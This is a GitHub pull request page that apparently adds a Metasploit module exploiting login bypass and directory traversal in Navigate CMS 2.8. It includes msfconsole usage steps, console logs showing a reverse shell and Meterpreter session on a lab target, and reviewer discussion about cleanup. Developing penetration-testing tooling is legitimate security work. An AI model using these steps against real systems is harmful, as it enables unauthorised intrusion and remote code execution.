Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Navigate CMS Unauthenticated Remote Code Execution #10704

Merged
merged 7 commits into from Oct 4, 2018

Conversation

Pyriphlegethon
Copy link
Contributor

@Pyriphlegethon Pyriphlegethon commented Sep 26, 2018

This module exploits two vulnerabilities in Navigate CMS 2.8 that allow an unauthenticated attacker to gain remote code execution.

Verification

  • Install Navigate CMS 2.8
    • wget http://master.dl.sourceforge.net/project/navigatecms/releases/navigate-2.8r1302.zip
    • unzip navigate-2.8r1302.zip
    • Browse to http://localhost/setup.php
  • Start msfconsole
  • use exploit/multi/http/navigate_cms_rce
  • set RHOST <rhost>
  • check
  • Verify that The target appears to be vulnerable. is returned
  • exploit
  • Verify that a meterpreter session is opened

Example Output

msf5 > use exploit/multi/http/navigate_cms_rce
msf5 exploit(multi/http/navigate_cms_rce) > set RHOST 192.168.178.45
RHOST => 192.168.178.45
msf5 exploit(multi/http/navigate_cms_rce) > check
[*] 192.168.178.45:80 The target appears to be vulnerable.
msf5 exploit(multi/http/navigate_cms_rce) > exploit

[*] Started reverse TCP handler on 192.168.178.35:4444 
[+] Login bypass successful
[+] Upload successful
[*] Triggering payload...
[*] Sending stage (37775 bytes) to 192.168.178.45
[*] Meterpreter session 1 opened (192.168.178.35:4444 -> 192.168.178.45:52720) at 2018-09-26 22:24:59 +0200

meterpreter > 

@Pyriphlegethon
Copy link
Contributor Author

This module overwrites navigate_info.php. I know that it is possible to register files for deletion with Msf::Exploit::FileDropper but is there a way to automatically overwrite files with their former content after successful exploitation?

@bcoles
Copy link
Contributor

bcoles commented Sep 27, 2018

Is there a reason it needs to overwrite an existing file?

You can specify cleanup code in a cleanup method. This method will run after the module has completed, regardless of whether exploitation was successful. You could exploit the same vulnerability to attempt to overwrite the old file with it's old contents.

There are a few examples in the framework. Perhaps check out modules/exploits/linux/http/dlink_dcs931l_upload.rb which overwrites a shell script to gain a shell, then re-writes the old content back to the file in cleanup.

It's worth noting that if the application depends on the overwritten file to be exploitable, if you mess up, then you're then unable to re-exploit and repair the file, which is bad.

@jrobles-r7 jrobles-r7 self-assigned this Oct 1, 2018
@jrobles-r7 jrobles-r7 merged commit 9772972 into rapid7:master Oct 4, 2018
jrobles-r7 added a commit that referenced this pull request Oct 4, 2018
@jrobles-r7
Copy link
Contributor

msf5 exploit(multi/http/navigate_cms_rce) > exploit
[*] Exploiting target 172.22.222.200

[*] Started reverse TCP handler on 172.22.222.130:4444 
[+] Login bypass successful
[+] Upload successful
[*] Triggering payload...
[*] Sending stage (37775 bytes) to 172.22.222.200
[*] Meterpreter session 1 opened (172.22.222.130:4444 -> 172.22.222.200:51038) at 2018-10-04 06:46:23 -0500
[*] Session 1 created in the background.
msf5 exploit(multi/http/navigate_cms_rce) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer    : DESKTOP-IPOGIJR
OS          : Windows NT DESKTOP-IPOGIJR 10.0 build 17134 (Windows 10) AMD64
Meterpreter : php/windows
meterpreter >

msjenkins-r7 pushed a commit that referenced this pull request Oct 4, 2018
@jrobles-r7
Copy link
Contributor

jrobles-r7 commented Oct 4, 2018

Release Notes

The exploit/multi/http/navigate_cms_rce module exploits login bypass and directory traversal vulnerabilities in Navigate CMS v2.8 to upload and execute PHP code.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
None yet
Development

Successfully merging this pull request may close these issues.

None yet

4 participants